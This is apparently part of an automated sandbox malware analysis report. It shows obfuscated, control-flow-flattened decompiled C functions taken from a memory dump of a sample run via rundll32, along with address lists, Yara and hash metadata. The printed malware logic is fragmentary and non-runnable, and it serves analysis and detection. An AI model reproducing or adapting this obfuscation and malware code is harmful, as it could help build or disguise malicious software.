				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E00377FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E00390C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E00380DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E00390E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E00390E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E00373DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

































                                                                                                                                                            0x0037773c
                                                                                                                                                            0x00377745
                                                                                                                                                            0x0037774d
                                                                                                                                                            0x00377754
                                                                                                                                                            0x0037775b
                                                                                                                                                            0x0037775c
                                                                                                                                                            0x0037775d
                                                                                                                                                            0x0037775f
                                                                                                                                                            0x00377764
                                                                                                                                                            0x00377772
                                                                                                                                                            0x00377775
                                                                                                                                                            0x00377778
                                                                                                                                                            0x0037777f
                                                                                                                                                            0x00377780
                                                                                                                                                            0x00377781
                                                                                                                                                            0x00377789
                                                                                                                                                            0x00377791
                                                                                                                                                            0x00377799
                                                                                                                                                            0x003777a1
                                                                                                                                                            0x003777a9
                                                                                                                                                            0x003777b1
                                                                                                                                                            0x003777b9
                                                                                                                                                            0x003777c1
                                                                                                                                                            0x003777c9
                                                                                                                                                            0x003777d1
                                                                                                                                                            0x003777d9
                                                                                                                                                            0x003777de
                                                                                                                                                            0x003777e6
                                                                                                                                                            0x003777ee
                                                                                                                                                            0x003777fb
                                                                                                                                                            0x003777fc
                                                                                                                                                            0x00377800
                                                                                                                                                            0x00377808
                                                                                                                                                            0x00377810
                                                                                                                                                            0x00377815
                                                                                                                                                            0x0037781d
                                                                                                                                                            0x00377825
                                                                                                                                                            0x0037782d
                                                                                                                                                            0x0037783b
                                                                                                                                                            0x0037783f
                                                                                                                                                            0x00377847
                                                                                                                                                            0x0037784f
                                                                                                                                                            0x00377857
                                                                                                                                                            0x0037785f
                                                                                                                                                            0x00377867
                                                                                                                                                            0x0037786f
                                                                                                                                                            0x00377877
                                                                                                                                                            0x0037787f
                                                                                                                                                            0x00377887
                                                                                                                                                            0x0037788f
                                                                                                                                                            0x00377897
                                                                                                                                                            0x0037789f
                                                                                                                                                            0x003778a7
                                                                                                                                                            0x003778af
                                                                                                                                                            0x003778b7
                                                                                                                                                            0x003778bb
                                                                                                                                                            0x003778c3
                                                                                                                                                            0x003778cb
                                                                                                                                                            0x003778d3
                                                                                                                                                            0x003778db
                                                                                                                                                            0x003778e3
                                                                                                                                                            0x003778eb
                                                                                                                                                            0x003778f3
                                                                                                                                                            0x003778fb
                                                                                                                                                            0x00377903
                                                                                                                                                            0x00377908
                                                                                                                                                            0x00377910
                                                                                                                                                            0x0037791d
                                                                                                                                                            0x00377921
                                                                                                                                                            0x0037792e
                                                                                                                                                            0x0037793b
                                                                                                                                                            0x00377943
                                                                                                                                                            0x00377948
                                                                                                                                                            0x0037794d
                                                                                                                                                            0x00377955
                                                                                                                                                            0x00377962
                                                                                                                                                            0x00377966
                                                                                                                                                            0x00377973
                                                                                                                                                            0x00377977
                                                                                                                                                            0x0037797f
                                                                                                                                                            0x00377987
                                                                                                                                                            0x0037798f
                                                                                                                                                            0x00377997
                                                                                                                                                            0x0037799f
                                                                                                                                                            0x003779a7
                                                                                                                                                            0x003779af
                                                                                                                                                            0x003779af
                                                                                                                                                            0x003779bd
                                                                                                                                                            0x00377aac
                                                                                                                                                            0x00377aad
                                                                                                                                                            0x00377aae
                                                                                                                                                            0x00377ab3
                                                                                                                                                            0x00377ab7
                                                                                                                                                            0x00377ab9
                                                                                                                                                            0x00377abf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377abf
                                                                                                                                                            0x003779c3
                                                                                                                                                            0x003779c5
                                                                                                                                                            0x00377a90
                                                                                                                                                            0x00377a93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779cb
                                                                                                                                                            0x003779d1
                                                                                                                                                            0x00377a7c
                                                                                                                                                            0x00377a7e
                                                                                                                                                            0x00377a81
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779d7
                                                                                                                                                            0x003779dd
                                                                                                                                                            0x00377a4f
                                                                                                                                                            0x00377a66
                                                                                                                                                            0x00377a6b
                                                                                                                                                            0x00377a6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779df
                                                                                                                                                            0x003779e5
                                                                                                                                                            0x00377a35
                                                                                                                                                            0x00377a3d
                                                                                                                                                            0x00377a42
                                                                                                                                                            0x00377a45
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779e7
                                                                                                                                                            0x003779e7
                                                                                                                                                            0x003779ed
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779f3
                                                                                                                                                            0x00377a0b
                                                                                                                                                            0x00377a10
                                                                                                                                                            0x003779ed
                                                                                                                                                            0x003779e5
                                                                                                                                                            0x003779dd
                                                                                                                                                            0x003779d1
                                                                                                                                                            0x003779c5
                                                                                                                                                            0x00377a13
                                                                                                                                                            0x00377a24
                                                                                                                                                            0x00377a24
                                                                                                                                                            0x00377ad8
                                                                                                                                                            0x00377add
                                                                                                                                                            0x00377ae0
                                                                                                                                                            0x00377ae5
                                                                                                                                                            0x00377ae5
                                                                                                                                                            0x00377ae5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                                                            • API String ID: 0-2956538602
                                                                                                                                                            • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                                            • Instruction ID: 017bff9f0eb2ed6ccd02224880146e9eb9330d2b001f741631b12309fec3bfe6
                                                                                                                                                            • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                                            • Instruction Fuzzy Hash: D9913D710093419FD7A9CF65DA8692BBBF1FBC4708F10991DF29696220D3B98A49CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00374816 Relevance: 6.4, Strings: 5, Instructions: 180COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E00374816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E0038847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E00377FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E0038847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}



































                                                                                                                                                            0x0037481d
                                                                                                                                                            0x00374821
                                                                                                                                                            0x00374823
                                                                                                                                                            0x00374827
                                                                                                                                                            0x0037482b
                                                                                                                                                            0x0037482f
                                                                                                                                                            0x00374830
                                                                                                                                                            0x00374831
                                                                                                                                                            0x00374836
                                                                                                                                                            0x0037483b
                                                                                                                                                            0x0037483e
                                                                                                                                                            0x00374848
                                                                                                                                                            0x00374850
                                                                                                                                                            0x00374852
                                                                                                                                                            0x0037485a
                                                                                                                                                            0x0037485f
                                                                                                                                                            0x00374867
                                                                                                                                                            0x0037486c
                                                                                                                                                            0x00374874
                                                                                                                                                            0x00374879
                                                                                                                                                            0x00374881
                                                                                                                                                            0x00374889
                                                                                                                                                            0x0037488e
                                                                                                                                                            0x00374896
                                                                                                                                                            0x0037489e
                                                                                                                                                            0x003748a6
                                                                                                                                                            0x003748ae
                                                                                                                                                            0x003748b3
                                                                                                                                                            0x003748bb
                                                                                                                                                            0x003748c3
                                                                                                                                                            0x003748cb
                                                                                                                                                            0x003748d3
                                                                                                                                                            0x003748db
                                                                                                                                                            0x003748ea
                                                                                                                                                            0x003748ed
                                                                                                                                                            0x003748f1
                                                                                                                                                            0x003748f6
                                                                                                                                                            0x003748fe
                                                                                                                                                            0x00374906
                                                                                                                                                            0x0037490e
                                                                                                                                                            0x00374916
                                                                                                                                                            0x0037491e
                                                                                                                                                            0x00374926
                                                                                                                                                            0x0037492e
                                                                                                                                                            0x00374936
                                                                                                                                                            0x0037493e
                                                                                                                                                            0x00374948
                                                                                                                                                            0x0037494c
                                                                                                                                                            0x00374954
                                                                                                                                                            0x0037495c
                                                                                                                                                            0x00374964
                                                                                                                                                            0x0037496c
                                                                                                                                                            0x0037497c
                                                                                                                                                            0x00374980
                                                                                                                                                            0x00374988
                                                                                                                                                            0x00374994
                                                                                                                                                            0x00374997
                                                                                                                                                            0x0037499b
                                                                                                                                                            0x003749a3
                                                                                                                                                            0x003749ab
                                                                                                                                                            0x003749b3
                                                                                                                                                            0x003749bb
                                                                                                                                                            0x003749c3
                                                                                                                                                            0x003749cb
                                                                                                                                                            0x003749d5
                                                                                                                                                            0x003749e3
                                                                                                                                                            0x003749e8
                                                                                                                                                            0x003749ee
                                                                                                                                                            0x003749fb
                                                                                                                                                            0x00374a03
                                                                                                                                                            0x00374a0b
                                                                                                                                                            0x00374a13
                                                                                                                                                            0x00374a1b
                                                                                                                                                            0x00374a23
                                                                                                                                                            0x00374a2f
                                                                                                                                                            0x00374a37
                                                                                                                                                            0x00374a3b
                                                                                                                                                            0x00374a43
                                                                                                                                                            0x00374a4b
                                                                                                                                                            0x00374a53
                                                                                                                                                            0x00374a5b
                                                                                                                                                            0x00374a63
                                                                                                                                                            0x00374a6b
                                                                                                                                                            0x00374a73
                                                                                                                                                            0x00374a7b
                                                                                                                                                            0x00374a83
                                                                                                                                                            0x00374a83
                                                                                                                                                            0x00374a8d
                                                                                                                                                            0x00374ac9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374a8f
                                                                                                                                                            0x00374a91
                                                                                                                                                            0x00374b4f
                                                                                                                                                            0x00374a97
                                                                                                                                                            0x00374a9d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374a9f
                                                                                                                                                            0x00374aaf
                                                                                                                                                            0x00374ab0
                                                                                                                                                            0x00374ab9
                                                                                                                                                            0x00374abf
                                                                                                                                                            0x00374ac5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374ac5
                                                                                                                                                            0x00374abf
                                                                                                                                                            0x00374a9d
                                                                                                                                                            0x00374a91
                                                                                                                                                            0x00374b58
                                                                                                                                                            0x00374b60
                                                                                                                                                            0x00374b60
                                                                                                                                                            0x00374afa
                                                                                                                                                            0x00374aff
                                                                                                                                                            0x00374b04
                                                                                                                                                            0x00374b10
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374b06
                                                                                                                                                            0x00374b06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374b06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374b15
                                                                                                                                                            0x00374b15
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -e$62$?M'$h\c$z
                                                                                                                                                            • API String ID: 0-1842174784
                                                                                                                                                            • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                                            • Instruction ID: f694b65c4af326c9de935e4d5bcde5507e686281608537ea2cf5514ccce6d03f
                                                                                                                                                            • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                                            • Instruction Fuzzy Hash: 20812F715093819FD3A9CF65C58991FBBF5FBC9758F408A0CF29586260D3B6DA088F42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038BE27 Relevance: 6.4, Strings: 5, Instructions: 130COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0038BE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E0037ADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E0038DBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E0037CDCD(_v56, _v20);
					}
					_t139 = E0038CADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}



























                                                                                                                                                            0x0038be30
                                                                                                                                                            0x0038be39
                                                                                                                                                            0x0038be3d
                                                                                                                                                            0x0038be44
                                                                                                                                                            0x0038be4b
                                                                                                                                                            0x0038be52
                                                                                                                                                            0x0038be59
                                                                                                                                                            0x0038be60
                                                                                                                                                            0x0038be67
                                                                                                                                                            0x0038be6e
                                                                                                                                                            0x0038be72
                                                                                                                                                            0x0038be79
                                                                                                                                                            0x0038be80
                                                                                                                                                            0x0038be87
                                                                                                                                                            0x0038be8e
                                                                                                                                                            0x0038be95
                                                                                                                                                            0x0038bea3
                                                                                                                                                            0x0038bea5
                                                                                                                                                            0x0038beaa
                                                                                                                                                            0x0038beb2
                                                                                                                                                            0x0038beb7
                                                                                                                                                            0x0038bebc
                                                                                                                                                            0x0038bec3
                                                                                                                                                            0x0038beca
                                                                                                                                                            0x0038bece
                                                                                                                                                            0x0038bed5
                                                                                                                                                            0x0038bedc
                                                                                                                                                            0x0038bee3
                                                                                                                                                            0x0038beea
                                                                                                                                                            0x0038bef1
                                                                                                                                                            0x0038bef8
                                                                                                                                                            0x0038beff
                                                                                                                                                            0x0038bf06
                                                                                                                                                            0x0038bf0a
                                                                                                                                                            0x0038bf11
                                                                                                                                                            0x0038bf18
                                                                                                                                                            0x0038bf1c
                                                                                                                                                            0x0038bf20
                                                                                                                                                            0x0038bf27
                                                                                                                                                            0x0038bf2e
                                                                                                                                                            0x0038bf35
                                                                                                                                                            0x0038bf3c
                                                                                                                                                            0x0038bf49
                                                                                                                                                            0x0038bf50
                                                                                                                                                            0x0038bf5b
                                                                                                                                                            0x0038bf5c
                                                                                                                                                            0x0038bf5f
                                                                                                                                                            0x0038bf66
                                                                                                                                                            0x0038bf6d
                                                                                                                                                            0x0038bf74
                                                                                                                                                            0x0038bf80
                                                                                                                                                            0x0038bf86
                                                                                                                                                            0x0038bf89
                                                                                                                                                            0x0038bf90
                                                                                                                                                            0x0038bf97
                                                                                                                                                            0x0038bf9e
                                                                                                                                                            0x0038bfa1
                                                                                                                                                            0x0038bfa8
                                                                                                                                                            0x0038bfb9
                                                                                                                                                            0x0038bfb9
                                                                                                                                                            0x0038bfbd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bfb3
                                                                                                                                                            0x0038bfc1
                                                                                                                                                            0x0038bfb5
                                                                                                                                                            0x0038bfb5
                                                                                                                                                            0x0038bfb7
                                                                                                                                                            0x0038bfb8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bfb8
                                                                                                                                                            0x0038bfc4
                                                                                                                                                            0x0038bfd9
                                                                                                                                                            0x0038bfdf
                                                                                                                                                            0x0038bffd
                                                                                                                                                            0x0038c00c
                                                                                                                                                            0x0038c011
                                                                                                                                                            0x0038c019
                                                                                                                                                            0x0038c01a
                                                                                                                                                            0x0038c023
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c029
                                                                                                                                                            0x0038bff0
                                                                                                                                                            0x0038bff5
                                                                                                                                                            0x0038bffb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c031
                                                                                                                                                            0x0038c031
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                                                            • API String ID: 0-1567385930
                                                                                                                                                            • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                                            • Instruction ID: 0c77794328ac54f7c6505215bbce161bb0b47e594ec8c78ad78ad59109c88a62
                                                                                                                                                            • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                                            • Instruction Fuzzy Hash: 8C512171C0531AEBDF19DFA4D94A8EEFBB1FB08314F208199D512BA260C7B51A45CFA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                                                            • SendMessageA.USER32 ref: 1001B48B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
